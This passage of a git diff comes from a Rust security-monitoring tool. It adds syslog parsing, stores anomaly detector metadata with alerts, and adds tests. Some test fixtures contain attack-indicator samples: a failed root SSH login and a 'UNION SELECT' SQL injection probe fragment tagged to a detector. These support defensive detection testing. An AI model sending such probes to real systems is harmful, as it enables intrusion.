test_apply_ip_ban_records_offense_metadata_from_anomaly() { let orchestrator = SniffOrchestrator::new(memory_sniff_config()).unwrap(); diff --git a/src/sniff/reader.rs b/src/sniff/reader.rs index 6f1c235..8029226 100644 --- a/src/sniff/reader.rs +++ b/src/sniff/reader.rs @@ -5,7 +5,7 @@ use anyhow::Result; use async_trait::async_trait; -use chrono::{DateTime, Utc}; +use chrono::{DateTime, Datelike, 
NaiveDateTime, Utc}; use std::collections::HashMap; use std::fs::File; use std::io::{BufRead, BufReader, Seek, SeekFrom}; @@ -82,12 +82,7 @@ impl FileLogReader { let decoded = String::from_utf8_lossy(&line); let trimmed = decoded.trim_end().to_string(); if !trimmed.is_empty() { - entries.push(LogEntry { - source_id: self.source_id.clone(), - timestamp: Utc::now(), - line: trimmed, - metadata: HashMap::from([("source_path".into(), self.path.clone())]), - }); + entries.push(parse_file_log_entry(&self.source_id, &self.path, &trimmed)); } line.clear(); } @@ -103,6 +98,85 @@ impl FileLogReader { } } +fn parse_file_log_entry(source_id: &str, source_path: &str, raw_line: &str) -> LogEntry { + let (timestamp, line, mut metadata) = parse_syslog_line(raw_line); + metadata.insert("source_path".into(), source_path.to_string()); + + LogEntry { + source_id: source_id.to_string(), + timestamp, + line, + metadata, + } +} + +fn parse_syslog_line(raw_line: &str) -> (DateTime, String, HashMap) { + parse_rfc5424_syslog(raw_line) + .or_else(|| parse_rfc3164_syslog(raw_line)) + .unwrap_or_else(|| (Utc::now(), raw_line.to_string(), HashMap::new())) +} + +fn parse_rfc5424_syslog( + raw_line: &str, +) -> Option<(DateTime, String, HashMap)> { + let line = raw_line.trim(); + let rest = line.strip_prefix('<')?; + let pri_end = rest.find('>')?; + let after_pri = &rest[pri_end + 1..]; + let fields: Vec<&str> = after_pri.splitn(8, ' ').collect(); + if fields.len() < 8 { + return None; + } + if !fields[0].chars().all(|ch| ch.is_ascii_digit()) { + return None; + } + + let timestamp = chrono::DateTime::parse_from_rfc3339(fields[1]) + .ok()? 
+ .with_timezone(&Utc); + let host = fields[2]; + let app = fields[3]; + let message = fields[7].trim(); + + let mut metadata = HashMap::new(); + metadata.insert("syslog_host".into(), host.to_string()); + metadata.insert("syslog_app".into(), app.to_string()); + metadata.insert("syslog_format".into(), "rfc5424".into()); + + Some((timestamp, message.to_string(), metadata)) +} + +fn parse_rfc3164_syslog( + raw_line: &str, +) -> Option<(DateTime, String, HashMap)> { + if raw_line.len() < 16 { + return None; + } + + let timestamp_part = raw_line.get(..15)?; + let year = Utc::now().year(); + let naive = + NaiveDateTime::parse_from_str(&format!("{} {}", timestamp_part, year), "%b %e %H:%M:%S %Y") + .ok()?; + let timestamp = DateTime::::from_naive_utc_and_offset(naive, Utc); + + let remainder = raw_line.get(16..)?.trim_start(); + let (host, message_part) = remainder.split_once(' ')?; + let (line, program) = match message_part.split_once(": ") { + Some((program, message)) => (message.to_string(), Some(program.to_string())), + None => (message_part.to_string(), None), + }; + + let mut metadata = HashMap::new(); + metadata.insert("syslog_host".into(), host.to_string()); + metadata.insert("syslog_format".into(), "rfc3164".into()); + if let Some(program) = program { + metadata.insert("syslog_program".into(), program); + } + + Some((timestamp, line, metadata)) +} + #[async_trait] impl LogReader for FileLogReader { async fn read_new_entries(&mut self) -> Result> { @@ -435,6 +509,77 @@ mod tests { assert_eq!(entries[0].metadata.get("source_path"), Some(&path_str)); } + #[tokio::test] + async fn test_file_log_reader_parses_rfc3164_syslog_lines() { + let dir = tempfile::tempdir().unwrap(); + let path = dir.path().join("syslog.log"); + { + let mut f = File::create(&path).unwrap(); + writeln!( + f, + "Apr 7 09:30:00 host sshd[123]: Failed password for root from 192.0.2.10" + ) + .unwrap(); + } + + let mut reader = FileLogReader::new("syslog".into(), path.to_string_lossy().to_string(), 
0); + let entries = reader.read_new_entries().await.unwrap(); + + assert_eq!(entries.len(), 1); + assert_eq!( + entries[0].metadata.get("syslog_format").map(String::as_str), + Some("rfc3164") + ); + assert_eq!( + entries[0].metadata.get("syslog_host").map(String::as_str), + Some("host") + ); + assert_eq!( + entries[0] + .metadata + .get("syslog_program") + .map(String::as_str), + Some("sshd[123]") + ); + assert!(entries[0].line.starts_with("Failed password for root")); + } + + #[tokio::test] + async fn test_file_log_reader_parses_rfc5424_syslog_lines() { + let dir = tempfile::tempdir().unwrap(); + let path = dir.path().join("syslog5424.log"); + { + let mut f = File::create(&path).unwrap(); + writeln!( + f, + "<34>1 2026-04-07T09:30:00Z host sshd - - - Failed password for root from 192.0.2.10" + ) + .unwrap(); + } + + let mut reader = FileLogReader::new("syslog".into(), path.to_string_lossy().to_string(), 0); + let entries = reader.read_new_entries().await.unwrap(); + + assert_eq!(entries.len(), 1); + assert_eq!( + entries[0].metadata.get("syslog_format").map(String::as_str), + Some("rfc5424") + ); + assert_eq!( + entries[0].metadata.get("syslog_host").map(String::as_str), + Some("host") + ); + assert_eq!( + entries[0].metadata.get("syslog_app").map(String::as_str), + Some("sshd") + ); + assert_eq!(entries[0].line, "Failed password for root from 192.0.2.10"); + assert_eq!( + entries[0].timestamp.to_rfc3339(), + "2026-04-07T09:30:00+00:00" + ); + } + #[test] fn test_docker_log_reader_new() { let reader = DockerLogReader::new("d-1".into(), "abc123".into()); diff --git a/src/sniff/reporter.rs b/src/sniff/reporter.rs index 192aabf..c9c62f4 100644 --- a/src/sniff/reporter.rs +++ b/src/sniff/reporter.rs @@ -6,6 +6,8 @@ use crate::alerting::alert::{Alert, AlertSeverity, AlertType}; use crate::alerting::notifications::{NotificationConfig, NotificationResult}; use crate::database::connection::DbPool; +use crate::database::models::{Alert as StoredAlert, AlertMetadata}; +use 
crate::database::repositories::alerts::create_alert; use crate::database::repositories::log_sources; use crate::sniff::analyzer::{AnomalySeverity, LogSummary}; use anyhow::Result; @@ -70,14 +72,39 @@ impl Reporter { anomaly.description ); - let alert = Alert::new( - AlertType::AnomalyDetected, - alert_severity, - format!( - "[Log Sniff] {} — Source: {} | Sample: {}", - anomaly.description, summary.source_id, anomaly.sample_line - ), + let message = format!( + "[Log Sniff] {} — Source: {} | Sample: {}", + anomaly.description, summary.source_id, anomaly.sample_line ); + let alert = Alert::new(AlertType::AnomalyDetected, alert_severity, message.clone()); + + if let Some(pool) = pool { + let mut metadata = AlertMetadata::default() + .with_source(summary.source_id.clone()) + .with_reason(anomaly.description.clone()); + if let Some(detector_id) = &anomaly.detector_id { + metadata + .extra + .insert("detector_id".into(), detector_id.clone()); + } + if let Some(detector_family) = &anomaly.detector_family { + metadata + .extra + .insert("detector_family".into(), detector_family.clone()); + } + if let Some(confidence) = anomaly.confidence { + metadata + .extra + .insert("detector_confidence".into(), confidence.to_string()); + } + + create_alert( + pool, + StoredAlert::new(AlertType::AnomalyDetected, alert_severity, message) + .with_metadata(metadata), + ) + .await?; + } // Route to appropriate notification channels let channels = self @@ -125,6 +152,7 @@ pub struct ReportResult { mod tests { use super::*; use crate::database::connection::{create_pool, init_database}; + use crate::database::repositories::{list_alerts, AlertFilter}; use crate::sniff::analyzer::LogAnomaly; use chrono::Utc; @@ -179,6 +207,9 @@ mod tests { description: "High error rate".into(), severity: AnomalySeverity::High, sample_line: "ERROR: connection failed".into(), + detector_id: None, + detector_family: None, + confidence: None, }]); let result = reporter.report(&summary, None).await.unwrap(); @@ -203,6 
+234,37 @@ mod tests { assert_eq!(summaries[0].total_entries, 100); } + #[tokio::test] + async fn test_report_persists_detector_metadata_in_alerts() { + let pool = create_pool(":memory:").unwrap(); + init_database(&pool).unwrap(); + + let reporter = Reporter::new(NotificationConfig::default()); + let summary = make_summary(vec![LogAnomaly { + description: "Potential SQL injection probing detected".into(), + severity: AnomalySeverity::High, + sample_line: "GET /search?q=UNION%20SELECT".into(), + detector_id: Some("web.sqli-probe".into()), + detector_family: Some("Web".into()), + confidence: Some(84), + }]); + + reporter.report(&summary, Some(&pool)).await.unwrap(); + + let alerts = list_alerts(&pool, AlertFilter::default()).await.unwrap(); + assert_eq!(alerts.len(), 1); + let metadata = alerts[0].metadata.as_ref().unwrap(); + assert_eq!(metadata.source.as_deref(), Some("test-source")); + assert_eq!( + metadata.extra.get("detector_id").map(String::as_str), + Some("web.sqli-probe") + ); + assert_eq!( + metadata.extra.get("detector_family").map(String::as_str), + Some("Web") + ); + } + #[tokio::test] async fn test_report_multiple_anomalies() { let reporter = Reporter::new(NotificationConfig::default()); @@ -211,11 +273,17 @@ mod tests { description: "Error spike".into(), severity: AnomalySeverity::Critical, sample_line: "FATAL: OOM".into(), + detector_id: None, + detector_family: None, + confidence: None, }, LogAnomaly { description: "Unusual pattern".into(), severity: AnomalySeverity::Low, sample_line: "DEBUG: retry".into(), + detector_id: None, + detector_family: None, + confidence: None, }, ]); @@ -243,6 +311,9 @@ mod tests { description: "High error rate".into(), severity: AnomalySeverity::High, sample_line: "ERROR: connection failed".into(), + detector_id: None, + detector_family: None, + confidence: None, }]); let result = reporter.report(&summary, None).await.unwrap(); diff --git a/web/package.json b/web/package.json index ff62a3b..d4d59b5 100644 --- 
a/web/package.json +++ b/web/package.json @@ -1,7 +1,7 @@ { "name": "stackdog-web", "description": "Stackdog Security Web Dashboard", - "version": "0.2.1", + "version": "0.2.2", "scripts": { "start": "cross-env REACT_APP_VERSION=$npm_package_version webpack serve --mode development", "build": "cross-env REACT_APP_VERSION=$npm_package_version webpack --mode production",